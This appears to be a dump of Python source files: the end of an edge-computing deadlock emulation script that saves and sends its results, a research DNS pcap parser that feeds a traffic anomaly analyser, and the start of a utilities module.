f"\noff_mec{_id_}_3_{mec_no} = {_off_mec} \noff_cloud{_id_}_3_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_3_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_3_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_3_{mec_no} = {deadlock} \nmemory{_id_}_3_{mec_no} = {memory}",
f"\ntask_received{_id_}_3_{mec_no} = {total_received_task} \nsent_t{_id_}_3_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_3_{mec_no} = {cooperate} \ntask_record{_id_}_3_{mec_no} = {task_record} ",
f"\noutward_mec{_id_}_3_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_3_{mec_no} = {offload_check}",
f"\ntimed_out_tasks{_id_}_3_{mec_no} = {timed_out_tasks}"
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}{_id_}_3_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_3_{mec_no}datap.py"
os.system(cmd)
else:
os.mkdir(path_)
cmd = f"echo '' > {path_}{_id_}_3_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_3_{mec_no}datap.py"
os.system(cmd)
file_ = open(f'{path_}{_id_}_3_{mec_no}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}{_id_}_3_{mec_no}datal.py'
file_.write(i)
os.system(cmd)
file_.close()
sp.run(
["scp", f"{path_}{_id_}_3_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:{send_path}"])
send_result(hosts['osboxes-0'], list_result)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
def terminate_process():
global prev_t, _loc, _off_mec, _off_cloud, _inward_mec, outward_mec, deadlock, memory, mec_waiting_time, mec_rtt
global offload_register, reoffload_list, discovering, test, _time, _pos, received_task_queue, received_time
global cloud_register, t_track, task_record, task_id, cooperate, clients_record, offload_check
global timed_out_tasks, total_received_task, _cpu
# reinitialize #
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
outward_mec = 0 # keeps count of tasks sent back to another mec after executing
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records that’s re-offloaded to mec to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
t_track = 1
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
cooperate = {'mec': 0, 'cloud': 0}
clients_record = {}
offload_check = [0, 0]
timed_out_tasks = 0
total_received_task = 0
time.sleep(1)
run = 1 # tell agents child when to stop
def start_loop():
global _loc
global tasks
global t_time
global node_id
global run
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
func_to_thread = [receive_message, receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
threads_ = []
stop = False
for i in func_to_thread:
threads_.append(Thread(target=i, args=(lambda: stop,)))
threads_[-1].daemon = True
threads_[-1].start()
print('algorithm is starting....')
while run == 1:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('EDF List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
list_seq = get_exec_seq(edf())
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
if len(compare_result[0]) > 0:
print('\nSending to cooperative platform')
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(0.4)
except KeyboardInterrupt:
print('\nProgramme Terminated')
stop = False
for th in threads_:
th.join()
time.sleep(1)
print('done')
# os.system('kill -9 {}'.format(os.getpid()))
break
print('algo stopped!')
run = 1
stop = True
time.sleep(20)
for th in threads_:
th.join()
def run_me(hosts_, mec_no_, cloud_ip_, send_path, broker_ip_): # call this from agent
global discovering
global hosts
global mec_no
global host_ip
global cloud_ip
global my_algo
global broker_ip
print('mec ip: ', ip_address())
my_algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
hosts = hosts_
mec_no = mec_no_
cloud_ip = cloud_ip_
broker_ip = broker_ip_
host_ip = ip_address()
print('MEC Details: ', hosts)
discovering = 1
time.sleep(2)
for host in hosts:
if hosts[host] != host_ip:
mec_rtt[hosts[host]] = []
start_loop()
print('saving data')
save_and_send(send_path)
print('Terminating process')
terminate_process()
|
PcapParser.py
|
# Copyright (C) 2016 Manmeet Singh, Maninder Singh, Sanmeet kour
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
#
# Display Parser for DNS Query , DNS Response and DNS Failed Lookups
#
# !python2
import datetime
import socket
import sys
import ipaddr
import time
import dpkt
import thread
from threading import Thread
# try:
# import mysql.connector
# except:
# print("MySQl Not found")
import struct
import getopt
from whitelist import checkWhiteList
from DnsAnalyser import Network
from DnsAnalyser import map_analyse_data
syntax = "PcapParse.py -v -c 10000 -m < mode_val e.g. 0,1,2> -f <filename>"
# print messages 0- OFF , 1 -ON
VERBOSE = 1
# 0- Parse & display only
# 1- parse,display,store,
# 2 - parse & store don't display,
# 3 - CSV Write
# MODE = 0
# count of unknown responses /Previous , Query, Response
# CSV Wrapper
# TODO : batch row insert instead of single row write using some cache mechanism
class CSVWrapper:
def __init__(self, filename):
# if pipeline : 0 csv files are not created. pipeline 1 : csv files are created
self.pipeline = 0
self.my_req_cache_list = []
self.my_res_cache_list = []
self.h = Network(filename)
if self.pipeline:
return
else:
self.req_outfile = open(filename + "_req.csv", "wb")
self.res_outfile = open(filename + "_res.csv", "wb")
self.log_outfile = open(filename + "_log.csv", "wb")
def write_request(self, tid, reqIP, reqURL, nbrDomainToken, querytype, urlLength,dns_server_ip, timestamp):
if self.pipeline:
self.h.process_record(str(tid), str(reqIP), str(reqURL), str(nbrDomainToken), str(querytype), str(urlLength), str(timestamp), str(dns_server_ip))
return
if len(self.my_req_cache_list) != 3:
self.my_req_cache_list.append(str(tid) + "," + str(reqIP) + "," + str(reqURL).encode('ascii', 'ignore') + "," + str(nbrDomainToken) + "," + str(querytype) + "," + str(urlLength) + "," + str(timestamp) + "," + dns_server_ip + "\n")
else:
self.req_outfile.writelines(self.my_req_cache_list)
self.my_req_cache_list[0:3] = []
self.my_req_cache_list.append(str(tid) + "," + str(reqIP) + "," + str(reqURL) + "," + str(nbrDomainToken) + "," + str(querytype) + "," + str(urlLength) + "," + str(timestamp) + "," + dns_server_ip + "\n")
def write_response(self, tid, reqIP, reqURL, reqType, rescode, ttl, resolvedIp, receivedtimestamp):
if self.pipeline:
self.h.process_response(str(tid), str(reqIP), str(reqURL), str(rescode), str(ttl), str(resolvedIp), str(receivedtimestamp))
return
if len(self.my_res_cache_list) != 3:
self.my_res_cache_list.append(str(tid) + "," + str(reqIP) + "," + str(reqURL) + "," + str(reqType) + "," + str(rescode) + "," + str(ttl) + "," + str(resolvedIp) + "," + str(receivedtimestamp)+ "\n" )
else:
self.res_outfile.writelines(self.my_res_cache_list)
self.my_res_cache_list[0:3] = []
self.my_res_cache_list.append(str(tid) + "," + str(reqIP) + "," + str(reqURL) + "," + str(reqType) + "," + str(rescode) + "," + str(ttl) + "," + str(resolvedIp) + "," + str(receivedtimestamp) + "\n")
def write_log(self, sno, key, val):
if self.pipeline:
return
self.log_outfile.write(sno + "," + key + "," + val + "\n")
def close(self):
if self.pipeline:
self.h.find_anomaly()
return
self.req_outfile.close()
self.res_outfile.close()
self.log_outfile.close()
# MySQL Wrapper
class MySqlWrapper:
def __init__(self):
try:
self.cnx = mysql.connector.connect(user='root', password='mysql', host='127.0.0.1', database='bot')
except:
print("MySQL Failed")
def select(self, sql):
try:
cursor = self.cnx.cursor()
cursor.execute(sql)
results = cursor.fetchall()
if cursor.rowcount < 1:
return 0, 0
else :
return 1, results
except:
return 0, 0
def insert(self, sql):
try:
cursor = self.cnx.cursor()
cursor.execute(sql)
self.cnx.commit()
if cursor.rowcount < 1:
cursor.close()
return 0
else:
cursor.close()
return 1
except:
cursor.close()
return -1
def update(self, sql):
try:
cursor = self.cnx.cursor()
cursor.execute(sql)
self.cnx.commit()
# print cursor.rowcount
if cursor.rowcount < 1:
cursor.close()
return 0
else:
cursor.close()
return 1
except:
cursor.close()
return -1
# class PcapParser:
# Pcap parser Class
class PcapParser:
# Constructor
def __init__(self, _count, _mode, _filename, _verbose):
self.count = _count
self.filename = _filename
self.mode = _mode
self.verbose = _verbose
self.dnsUnknownResponseCount = 0
self.dnsQueryCount = 0
self.dnsResponseCount = 0
self.dnsFailedCount = 0
self.dnsPktCount = 0
self.csv_obj = CSVWrapper(_filename)
self.progress_index = 0
self.f = open(self.filename, 'rb')
self.pcap = dpkt.pcap.Reader(self.f)
self.c_name = ""
# default count of packets to parse
self.MAX_PKT_COUNT = 1000
self.start = datetime.datetime.now()
# Insert or update existing query with response code and other fields
def update_response(self, tid, reqIP, reqURL, reqType, rescode, ttl, resolvedIp, receivedtimestamp):
try:
if reqIP == "172.31.1.6" or reqIP == "172.31.3.121":
return 0
if self.mode == 3:
if checkWhiteList(reqURL) != 1:
self.csv_obj.write_response(tid, reqIP, reqURL, reqType, rescode, ttl, resolvedIp, receivedtimestamp)
return 0
except:
print (self.dnsPktCount + "Error: updateResponse ")
return 0
# disconnect from server
# check DNS packet or not
def check_dns_traffic(self):
# make sure we are dealing with IP traffic
try:
self.eth = dpkt.ethernet.Ethernet(self.buf)
except:
return 0
if self.eth.type != 2048:
return 0
# make sure we are dealing with UDP protocol
try:
self.ip = self.eth.data
except:
return 0
if self.ip.p != 17:
return 0
# filter on UDP assigned ports for DNS
try:
self.udp = self.ip.data
except:
return 0
if self.udp.sport != 53 and self.udp.dport != 53:
return 0
return 1
# wrapper to parse Request
def parse_request(self):
self.dnsQueryCount += 1
# Default Gateway and dns server skip query
if socket.inet_ntoa(self.ip.src) == '172.31.1.6' or socket.inet_ntoa(self.ip.src) == '172.31.3.121':
return
for self.query in self.dns.qd:
# If URL in white list skip the packet
# if MODE != 3:
if checkWhiteList(self.query.name) == 1:
if self.verbose == 1 and self.mode < 2:
print ("White list Presence : " + self.query.name)
continue
elif self.query.type != 0: # DNS_A
try:
# pt= query.name.split('.')
# ip_add = struct.unpack("!L", self.ip.src)[0]
if self.mode == 3:
self.csv_obj.write_request(self.dns.id, socket.inet_ntoa(self.ip.src),
self.query.name, self.query.name.count('.') + 1,
self.query.type, len(self.query.name),socket.inet_ntoa(self.ip.dst),
str(datetime.datetime.utcfromtimestamp(self.ts).strftime(
"%d/%m/%y %H:%M:%S")))
elif self.mode == 9:
print(self.ts, str(datetime.datetime.fromtimestamp(self.ts).strftime("%H:%M:%S")))
elif self.mode < 2:
print (self.dnsPktCount, '\t', self.dns.id, '\tQuery\t\t', socket.inet_ntoa(self.ip.src),
' \t ',
self.query.name, '\t', self.query.type, '\t', len(self.query.name), '\t',
self.query.name.count('.') + 1, '\t',
str(datetime.datetime.utcfromtimestamp(self.ts).strftime("%H:%M:%S")))
elif self.mode == 0 or self.mode == 1:
if self.checkRequest(self.dns.id, socket.inet_ntoa(self.ip.src), self.query.name,
self.query.type) == 0:
self.insertNewRequest(self.dns.id, socket.inet_ntoa(self.ip.src), self.query.name,
self.query.name.count('.') + 1, self.query.type, len(self.query.name), str(
datetime.datetime.utcfromtimestamp(self.ts).strftime("%d/%m/%y %H:%M:%S")))
else:
if VERBOSE:
print (str(self.dnsPktCount) + "\t" + "exist")
except:
continue
else:
print (self.dnsPktCount, '\t', 'Unhandled Request')
# wrapper to parse Answer, NS and Authoratative response records
def parse_response(self):
if self.answer.type == dpkt.dns.DNS_A: # DNS_A
try:
ipadd = struct.unpack("!L", self.answer.rdata)[0] # resolved self.ip
dstIP = struct.unpack("!L", self.ip.dst)[0] # Destination self.ip
if self.mode < 2:
print (self.dnsPktCount, '\t', self.dns.id, '\tResponse\t', self.answer.name, '->',
socket.inet_ntoa(self.answer.rdata), '\t', self.answer.ttl, '\t', self.answer.type, '\t',
socket.inet_ntoa(self.ip.dst), '\t',
str(datetime.datetime.utcfromtimestamp(self.ts).strftime("%H:%M:%S")))
if self.mode > 0:
if self.c_name == "":
self.update_response(self.dns.id, socket.inet_ntoa(self.ip.dst), self.answer.name,
self.answer.type, self.dns.rcode, self.answer.ttl,
socket.inet_ntoa(self.answer.rdata), str(
datetime.datetime.utcfromtimestamp(self.ts).strftime("%d/%m/%y %H:%M:%S")))
else:
self.update_response(self.dns.id, socket.inet_ntoa(self.ip.dst), self.c_name, self.answer.type,
self.dns.rcode, self.answer.ttl, socket.inet_ntoa(self.answer.rdata), str(
datetime.datetime.utcfromtimestamp(self.ts).strftime("%d/%m/%y %H:%M:%S")))
except:
if self.mode < 3:
print(self.dnsPktCount, '\t', "Unhandled Record Response type : " + str(self.answer.type))
elif self.answer.type == dpkt.dns.DNS_CNAME: # DNS_CNAME
try:
c_name = self.answer.name
if self.mode < 2:
print (self.dnsPktCount, '\t', self.dns.id, '\tResponse\t', self.answer.name, '->',
self.answer.cname, '\t',
self.answer.ttl, '\t', self.answer.type, '\t',
socket.inet_ntoa(self.ip.dst), '\t',
str(datetime.datetime.utcfromtimestamp(self.ts).strftime("%H:%M:%S"))
)
except:
print (self.dnsPktCount, '\t', "Failed")
elif self.answer.type == dpkt.dns.DNS_MX: # DNS_MX
try:
ipadd = struct.unpack("!L", self.answer.rdata)[0] # resolved self.ip
dstIP = struct.unpack("!L", self.ip.dst)[0] # Destination self.ip
if self.mode < 2:
print (self.dnsPktCount, '\t', self.dns.id, '\tResponse\t', self.answer.name, '->',
socket.inet_ntoa(self.answer.rdata), '\t', self.answer.ttl, '\t', self.answer.type, '\t',
socket.inet_ntoa(self.ip.dst), '\t',
str(datetime.datetime.utcfromtimestamp(self.ts).strftime("%H:%M:%S")))
if self.mode > 0:
if self.c_name == "":
self.updateResponse(self.csv_obj, self.dns.id, socket.inet_ntoa(self.ip.dst), self.answer.name,
self.answer.type,
self.dns.rcode, self.answer.ttl, socket.inet_ntoa(self.answer.rdata), str(
datetime.datetime.utcfromtimestamp(self.ts).strftime("%d/%m/%y %H:%M:%S")))
else:
self.updateResponse(self.csv_obj, self.dns.id, socket.inet_ntoa(self.ip.dst), self.cname,
self.answer.type,
self.dns.rcode, self.answer.ttl, socket.inet_ntoa(self.answer.rdata), str(
datetime.datetime.utcfromtimestamp(self.ts).strftime("%d/%m/%y %H:%M:%S")))
except:
if self.mode < 3:
print(self.dnsPktCount, '\t', "Unhandled Record Response type : " + str(self.answer.type))
elif self.answer.type == dpkt.dns.DNS_NS: # DNS_NS
try:
# ipadd = struct.unpack("!L", self.answer.rdata)[0] # resolved self.ip
dstIP = struct.unpack("!L", self.ip.dst)[0] # Destination self.ip
if self.mode < 2:
print (self.dnsPktCount, '\t', self.dns.id, '\tResponse\t', self.answer.name, '->',
self.answer.nsname, '\t', self.answer.ttl, '\t', self.answer.type, '\t',
socket.inet_ntoa(self.ip.dst), '\t',
str(datetime.datetime.utcfromtimestamp(self.ts).strftime("%H:%M:%S")))
if self.mode > 0:
if self.c_name == "":
if self.answer.rlen == 4:
self.update_response(self.dns.id, socket.inet_ntoa(self.ip.dst), self.answer.name,
self.answer.type,
self.dns.rcode, self.answer.ttl, socket.inet_ntoa(self.answer.rdata), str(
datetime.datetime.utcfromtimestamp(self.ts).strftime("%d/%m/%y %H:%M:%S")))
else:
# Ignore NS Records for TLD as they are not returning any IP and causing Exception in inet_itoa
if self.answer.rlen == 4:
self.update_response(self.dns.id, socket.inet_ntoa(self.ip.dst), self.c_name, self.answer.type,
self.dns.rcode, self.answer.ttl, socket.inet_ntoa(self.answer.rdata), str(
datetime.datetime.utcfromtimestamp(self.ts).strftime("%d/%m/%y %H:%M:%S")))
except:
if self.mode < 3:
print(self.dnsPktCount, '\t', "Unhandled Record Response type : " + str(self.answer.type))
elif self.answer.type == dpkt.dns.DNS_AAAA: # DNS_AAAA
try:
# dstIP = struct.unpack("!L", self.ip.dst)[0] # Destination self.ip
if self.mode < 2:
print(self.dnsPktCount, '\t', self.dns.id, '\tResponse\t', self.answer.name, '->',
str(ipaddr.IPv6Address(ipaddr.Bytes(self.answer.rdata))), '\t', self.answer.ttl, '\t',
self.answer.type, '\t',
socket.inet_ntoa(self.ip.dst), '\t',
str(datetime.datetime.utcfromtimestamp(self.ts).strftime(" %H:%M:%S")))
except:
print (self.dnsPktCount, '\t', self.dns.id, '\tResponse\t', "Failed Parsing DNS_AAAA ")
# DNSSEC Unhandled , txt records ,SRV records,PTR
elif self.answer.type == 12 or self.answer.type == 43 or self.answer.type == 46 or self.answer.type == 48 or \
self.answer.type == 16 or self.answer.type == 33 or self.answer.type == 6 or self.answer.type == 13:
if self.mode < 2:
print(self.dnsPktCount, '\t', self.dns.id, '\tResponse\t DNS SEC :Unhandled type ', self.answer.type)
else:
if self.mode < 3:
print(self.dnsPktCount, '\t', "Unhandled Record Response type : " + str(self.answer.type))
# Begining of Pcap parsing
def start_parse(self):
print ("Verbose : " + str(self.verbose))
print ("Mode : " + str(self.mode))
self.csv_obj.write_log("1", "Processing Started at", str(self.start))
print ("\n=============== Processing Started at " + str(self.start) + " =============\n")
self.progress_index = 10 # progress index =1,10,100,1000
for self.ts, self.buf in self.pcap:
if self.count <= self.dnsPktCount:
break
elif self.dnsPktCount == self.progress_index:
print '%10d' %self.dnsPktCount, "\t\t" + str(datetime.datetime.now() - self.start)
self.progress_index *= 10
if 0 == self.check_dns_traffic():
continue
# make the dns object out of the udp data and
# check for it being a RR (answer) and for opcode QUERY
try:
self.dns = dpkt.dns.DNS(self.udp.data)
except:
continue
# parse the dns Request & responses
self.dnsPktCount += 1
if self.dns.qr == dpkt.dns.DNS_Q:
self.parse_request()
if self.dns.qr != dpkt.dns.DNS_R:
# print (self.dns.qr)
continue
if self.dns.opcode != dpkt.dns.DNS_QUERY:
print (self.dns.opcode)
continue
# Error in Response Code
if self.dns.rcode != dpkt.dns.DNS_RCODE_NOERR:
self.dnsResponseCount += 1
if self.dns.rcode == dpkt.dns.DNS_RCODE_NXDOMAIN or self.dns.rcode == dpkt.dns.DNS_RCODE_REFUSED or \
self.dns.rcode == dpkt.dns.DNS_RCODE_SERVFAIL:
self.dnsFailedCount += 1
for answer in self.dns.qd:
try:
dstIP = struct.unpack("!L", self.ip.dst)[0] # Destination self.ip
if self.mode > 0:
self.update_response(self.dns.id, socket.inet_ntoa(self.ip.dst), self.answer.name, self.answer.type, self.dns.rcode, 0, 0, str(datetime.datetime.utcfromtimestamp(self.ts).strftime("%d/%m/%y %H:%M:%S")))
if self.mode < 2:
print (self.dnsPktCount, '\t', self.dns.id, '\tFail/Refused\t', self.answer.name, self.dns.rcode,
socket.inet_ntoa(self.ip.dst), '\t',
str(datetime.datetime.utcfromtimestamp(self.ts).strftime("%H:%M:%S")))
continue
except:
continue
else:
print (self.dnsPktCount, '\t', self.dns.id, ' unhandled dns.rcode:', self.dns.rcode)
continue
# New Types in DNS SEC not understood by the parser
if len(self.dns.an) < 1:
self.dnsResponseCount += 1
if self.dns.rcode != dpkt.dns.DNS_RCODE_REFUSED:
# Todo: DNS SEC support
if self.mode < 2:
print(self.dnsPktCount, '\t', self.dns.id, "\tResponse \t Unhandled DNSSEC : opcode",
self.dns.opcode, "\t Rcode", self.dns.rcode)
continue
try:
# process and print responses based on record type
c_name = ""
self.dnsResponseCount += 1
# for answer in dns.an:
for self.answer in self.dns.an:
self.parse_response()
for self.answer in self.dns.ns:
self.parse_response()
for self.answer in self.dns.ar:
self.parse_response()
except:
# print (dnsPktCount,'\t',"Unhandled Query type : " + str(self.answer.type))
print(self.dnsPktCount, '\t', "Unhandled Query type : ")
self.f.close()
print("\n=============== Processing completed at " + str(datetime.datetime.now()) + " ==========\n")
print("Total number of Packets Processed : \t\t" + str(self.dnsPktCount))
print("Total number of DNS Query : \t\t\t" + str(self.dnsQueryCount))
print("Total number of DNS Responses: \t\t\t" + str(self.dnsResponseCount))
print("Total number of Unknown Response Records : \t" + str(self.dnsUnknownResponseCount))
print("Total number of Failed Responses: \t\t" + str(self.dnsFailedCount))
print("Total Time taken : \t\t\t\t" + str(datetime.datetime.now() - self.start))
self.csv_obj.write_log("2", "Processing completed at ", str(datetime.datetime.now()))
self.csv_obj.write_log("3", "Total number of Packets Processed", str(self.dnsPktCount))
self.csv_obj.write_log("4", "Total number of DNS Query", str(self.dnsQueryCount))
self.csv_obj.write_log("5", "Total number of DNS Responses: ", str(self.dnsResponseCount))
self.csv_obj.write_log("6", "Total number of Unknown Response Records", str(self.dnsUnknownResponseCount))
self.csv_obj.write_log("7", "Total number of Failed Responses", str(self.dnsFailedCount))
self.csv_obj.write_log("8", "Total Time taken", str(datetime.datetime.now() - self.start))
# AnalyseData(self.filename + "_req.csv")
self.csv_obj.close()
#analyse_data(self.filename + "_req.csv")
# from DnsMapper
#csv_only = 0 ;
#if csv_only == 0:
# return
if self.csv_obj.pipeline == 0:
t = Thread(target=map_analyse_data, args=(self.filename, 1))
t.start()
t.join()
#thread.start_new_thread(map_analyse_data, (self.filename, 3))
#thread.join()
def batch_parse():
filename_list = ["20160423_235403.pcap","20160424_005404.pcap","20160424_015405.pcap","20160424_025406.pcap",
"20160424_035407.pcap","20160424_045408.pcap","20160424_055409.pcap","20160424_065410.pcap",
"20160424_075411.pcap","20160424_085412.pcap","20160424_095413.pcap","20160424_105414.pcap",
"20160424_115415.pcap","20160424_125416.pcap","20160424_135417.pcap","20160424_145418.pcap",
"20160424_155419.pcap","20160424_165420.pcap","20160424_175421.pcap","20160424_185422.pcap",
"20160424_195423.pcap","20160424_205424.pcap","20160424_215425.pcap","20160424_225426.pcap",
"20160424_235427.pcap","20160425_005428.pcap","20160425_015429.pcap","20160425_025430.pcap",
"20160425_035431.pcap","20160425_045432.pcap","20160425_055433.pcap","20160425_065434.pcap",
"20160425_075435.pcap","20160425_085436.pcap","20160425_095437.pcap","20160425_105438.pcap",
"20160425_115439.pcap","20160425_125440.pcap","20160425_135441.pcap","20160425_145442.pcap",
"20160425_155443.pcap","20160425_165444.pcap","20160425_175445.pcap","20160425_185446.pcap",
"20160425_195447.pcap","20160425_205448.pcap","20160425_215449.pcap","20160425_225450.pcap",
"20160426_231401.pcap","20160427_001402.pcap","20160427_011403.pcap","20160427_021404.pcap",
"20160427_031405.pcap","20160427_041406.pcap","20160427_051407.pcap","20160427_061408.pcap",
"20160427_071409.pcap","20160427_081410.pcap","20160427_091411.pcap","20160427_101412.pcap",
"20160427_111413.pcap","20160427_121414.pcap","20160427_131415.pcap","20160427_141416.pcap",
"20160427_151417.pcap","20160427_161418.pcap","20160427_171419.pcap","20160427_181420.pcap",
"20160427_191421.pcap","20160427_201422.pcap","20160427_211423.pcap","20160427_221424.pcap",
"20160427_231425.pcap","20160428_001426.pcap","20160428_011427.pcap","20160428_021428.pcap",
"20160428_031429.pcap","20160428_041430.pcap","20160428_051431.pcap","20160428_061432.pcap",
"20160428_071433.pcap","20160428_081434.pcap","20160428_091435.pcap","20160428_101436.pcap",
"20160428_111437.pcap","20160428_121438.pcap","20160428_131439.pcap","20160428_141440.pcap",
"20160428_151441.pcap","20160428_161442.pcap","20160428_171443.pcap","20160428_181444.pcap",
"20160428_191445.pcap","20160428_201446.pcap","20160428_211447.pcap","20160428_221448.pcap",
"20160428_231449.pcap","20160429_001450.pcap","20160429_011451.pcap","20160429_021452.pcap",
"20160429_031453.pcap","20160429_041454.pcap","20160429_051455.pcap","20160429_061456.pcap",
"20160429_071457.pcap","20160429_081458.pcap","20160429_091459.pcap","20160429_101500.pcap",
"20160429_111501.pcap","20160429_121502.pcap","20160429_131503.pcap","20160429_141504.pcap",
"20160429_151505.pcap","20160429_161506.pcap","20160429_171507.pcap","20160429_181508.pcap",
"20160429_191509.pcap","20160429_201510.pcap","20160429_211511.pcap","20160429_221512.pcap",
"20160429_231513.pcap","20160430_001514.pcap","20160430_011515.pcap","20160430_021516.pcap",
"20160430_031517.pcap","20160430_041518.pcap","20160430_051519.pcap","20160430_061520.pcap",
"20160430_071521.pcap","20160430_081522.pcap","20160430_091523.pcap","20160430_101524.pcap",
"20160430_111525.pcap","20160430_121526.pcap","20160430_131527.pcap","20160430_141528.pcap",
"20160430_151529.pcap","20160430_161530.pcap","20160430_171531.pcap","20160430_181532.pcap",
"20160430_191533.pcap","20160430_201534.pcap","20160430_211535.pcap","20160430_221536.pcap",
"20160430_231537.pcap","20160501_001538.pcap","20160501_011539.pcap","20160501_021540.pcap",
"20160501_031541.pcap","20160501_041542.pcap","20160501_051543.pcap","20160501_061544.pcap",
"20160501_071545.pcap","20160501_081546.pcap","20160501_091547.pcap","20160501_101548.pcap",
"20160501_111549.pcap","20160501_121550.pcap","20160501_131551.pcap","20160501_141552.pcap",
"20160501_151553.pcap","20160501_161554.pcap","20160501_171555.pcap","20160501_181556.pcap",
"20160501_191557.pcap","20160501_201558.pcap","20160501_211559.pcap","20160501_221600.pcap",
"20160506_231542.pcap","20160507_001543.pcap","20160507_011544.pcap","20160507_021545.pcap",
"20160507_031546.pcap","20160507_041547.pcap","20160507_051548.pcap","20160507_061549.pcap",
"20160507_071550.pcap","20160507_081551.pcap","20160507_091552.pcap","20160507_101553.pcap",
"20160507_111554.pcap","20160507_121555.pcap","20160507_131556.pcap","20160507_141557.pcap",
"20160507_151558.pcap","20160507_161559.pcap","20160507_171600.pcap","20160507_181601.pcap",
"20160507_191602.pcap","20160507_201603.pcap","20160507_211604.pcap","20160507_221605.pcap",
"20160507_231606.pcap","20160508_001607.pcap","20160508_011608.pcap","20160508_021609.pcap",
"20160508_031610.pcap","20160508_041611.pcap","20160508_051612.pcap","20160508_061613.pcap",
"20160508_071614.pcap","20160508_081615.pcap","20160508_091616.pcap","20160508_101617.pcap",
"20160508_111618.pcap","20160508_121619.pcap","20160508_131620.pcap","20160508_141621.pcap",
"20160508_151622.pcap","20160508_161623.pcap","20160508_171624.pcap","20160508_181625.pcap",
"20160508_191626.pcap","20160508_201627.pcap","20160508_211628.pcap","20160508_221629.pcap",
"20160508_231630.pcap","20160509_001631.pcap","20160509_011632.pcap","20160509_021633.pcap",
"20160509_031634.pcap","20160509_041635.pcap","20160509_051636.pcap","20160509_061637.pcap",
"20160509_071638.pcap","20160509_081639.pcap","20160509_091640.pcap","20160509_101641.pcap",
"20160509_111642.pcap","20160509_121643.pcap","20160509_131644.pcap","20160509_141645.pcap",
"20160509_151646.pcap","20160509_161647.pcap","20160509_171648.pcap","20160509_181649.pcap",
"20160509_191650.pcap","20160509_201651.pcap","20160509_211652.pcap","20160509_221653.pcap"]
for items in filename_list:
try:
#obj_dns_parser = PcapParser(10000000, 3, '../../Traffic/' + items, 1)
obj_dns_parser = PcapParser(10000000, 3, '../../sample_large.pcap', 1)
obj_dns_parser.start_parse()
return()
except:
print("File Not Found")
# return
time.sleep(5)
# obj_dns_parser = PcapParser(10000, 3, 'E:/Phd/python/scripts/DNS_AAAA.pcap', 1)
def main():
print ("\n================================= DNS Parse v0.01 =============================\n")
try:
opts, args = getopt.getopt(sys.argv[1:], "vm:c:f:")
# print (sys.argv)
except:
print(syntax)
sys.exit(2)
filename = ""
# Count of packets to parse
max_pkt_count = 1000
mode = 4
verbose = 0
for opt, arg in opts:
if opt == '-h':
print(syntax)
sys.exit()
elif opt in "-f":
filename = arg
print ("Opening File : " + str(filename))
elif opt in "-v":
verbose = 1
elif opt in "-m":
mode = int(arg)
elif opt in "-c":
max_pkt_count = int(arg)
print ("Maximum Packet count : " + str(max_pkt_count))
else:
print(syntax)
sys.exit()
if filename == "":
print(syntax)
#sys.exit()
obj_dns_parser = PcapParser(max_pkt_count, mode, filename, verbose)
#obj_dns_parser = PcapParser(1000, 3, '../sample/sample.pcap', 1)
obj_dns_parser.start_parse()
if __name__ == "__main__":
batch_parse()
|
utils.py
|
import os
from config import *
import random
import json
from tqdm import tqdm
from sql_formatter.formatting import translate_sql
import sqlite3
import multiprocessing
from multiprocessing import Manager
import time
random.seed(33)
def mkdir(path):
if os.path.exists(path):
print("{} already exists".format(path))
